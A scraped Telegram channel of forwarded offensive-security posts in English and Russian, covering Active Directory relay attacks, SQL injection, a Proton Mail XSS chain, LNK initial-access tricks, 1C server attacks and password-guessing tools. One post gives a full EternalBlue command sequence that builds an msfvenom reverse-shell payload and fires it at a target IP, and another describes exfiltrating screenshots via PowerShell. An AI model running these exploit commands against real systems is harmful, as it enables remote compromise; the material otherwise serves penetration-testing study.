Pentester`s Notes – Telegram
Pentester`s Notes
189 subscribers
47 photos
2 videos
31 files
136 links
Download Telegram
Forwarded from Pavel Cherepanov
Forwarded from Offensive Xwitter
😈 [ ShorSec Cyber Security @ShorSecLtd ]

🔥New Blog Post Alert!
The next chapter in our "The Path to DA" series is now live: "(Relaying) To The Internet And Back".
This entry, by @dec0ne, explores yet another route to DA, focusing on the intricacies of ADIDNS Abuse, LDAP relay, RBCD, and more.

🔗 https://shorsec.io/blog/the-path-to-da-part-2-relaying-to-the-internet-and-back/

🐥 [ tweet ]
Forwarded from Codeby
SQL-injection, UNION BASED - Быстрые техники

Приветствую тебя читатель! Надеюсь ты уже решил базовые задачки из предыдущей статьи. А сегодня я расскажу о более продвинутых техниках, позволяющих извлекать данные из баз гораздо быстрее. Данный подход называется DIOS (DUMP IN ONE SHOOT

📌 Читать далее

#sql #injection
Forwarded from Sergey
PodborParolPol82.epf
173.5 KB
Что именно? Внешняя обработка какая?
Forwarded from Aleksey
nasm -f bin eternalblue_kshellcode_x64.asm -o evilKernel.bin

msfvenom -p windows/x64/shell_reverse_tcp EXITFUNC=thread LHOST=10.14.57.233 LPORT=443 -f raw -o evilReverse.bin

cat evilKernel.bin evilReverse.bin > evilPayload.bin

python3 ../eternalblue_exploit7.py 10.10.118.242 evilPayload.bin 24

Done!
Forwarded from Cybred
https://www.sonarsource.com/blog/code-vulnerabilities-leak-emails-in-proton-mail/

Пятничное чтиво про сложные XSS в приватных почтовых сервисах Proton Mail, Skiff и Tutanota.

Описали пока только Proton Mail и цепочка выглядит так:
1. Обман Dom Purify, благодаря неправильному контексту с помощью тега <style> и тем, как он санитизирует его в HTML и SVG, а также последующей обработкой.
2. Побег из Sandbox Iframe из-за атрибута allow-noscripts, который "эксклюзивно" отображался для браузера Safari.
3. Обход CSP с крутой эксфильтрацией через blob и cross-fade() из CSS.

Все это приводит к тому, что, отправив сообщение жертве, атакующий может:
прочитать ее электронные письма расшифрованном виде
отправить электронные письма от её имени
украсть криптографические ключи.
Forwarded from Offensive Xwitter
😈 [ an0n @an0n_r0 ]

nothing novel, just playing with screenshot capture in PowerShell: get the screenshot to clipboard by sending PrtSc key using PS, send the image in an HTTP POST body, receive it with least effort using a CGI handler ran by Python http[.]server.

🐥 [ tweet ]
Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
ZipLink - Combine Zips and Lnk for fun and profit

Lnk files are still widely used for initial access.
However modern browsers change the file ending during download, so other ways of distribusion are needed.
For example an hta - lnk polyglot, zipped.
Forwarded from Offensive Xwitter
😈 [ eversinc33 @eversinc33 ]

Nice tool:) Reminded me of a noscript I wrote a while ago, which is for those environments where users have to change their pws every X months, resulting in passwords like January2022. The noscript simply uses the LDAP pwdLastSet attr to generate a wordlist.

🔗 https://github.com/eversinc33/CredGuess

🐥 [ tweet ][ quote ]
Forwarded from sdnv's funk-hole
Пентестеры в СНГ часто сталкиваются с 1С-серверами внутри инфраструктур, один из векторов атак - Консоль Администрирования Кластеров 1С (RAS).
Чтобы попытаться подключиться к нему - подбирают версию клиента коноли аналогичную серверу, скачивают нужный серверный дистрибутив под винду и только тогда смогут зайти под имеющимися/пустыми кредами получая кучу полезной информации.

Я автоматизировал этот процесс благодаря консольной утилите rac от 1С для Linux. Более того, больше не нужно подбирать версию клиента и сервера - утилита rac работает с разными версиями серверов.

Этапы: Скан nmap с поиском открытых портов RAS, Сбор информации при успешном подключении к серверу, Выгрузка полученной информации в .csv под каждый сервер. Более подробно в README

https://github.com/sdnv0x4d/rasoff
Forwarded from Кавычка (Bo0oM)
Снова про #1С

Как пишут в документации: "Внешние обработки представляют собой обработки, которые не входят в состав прикладного решения и хранятся в отдельных файлах с расширением *. epf.".
Так же пишут: "В режиме 1С:Предприятие внешнюю обработку можно запустить на выполнение, открыв ее как любой другой файл, хранящийся на диске."

В правом верхнем углу нажимаем на "бутерброд" -> Файл -> Открыть.

Выбираем наш epf и жмём "ок".
Но только 1С может быть не только под Windows, но и под Linux. Поэтому в коллекцию еще один шелл, который универсальный и под любую операционную систему.

>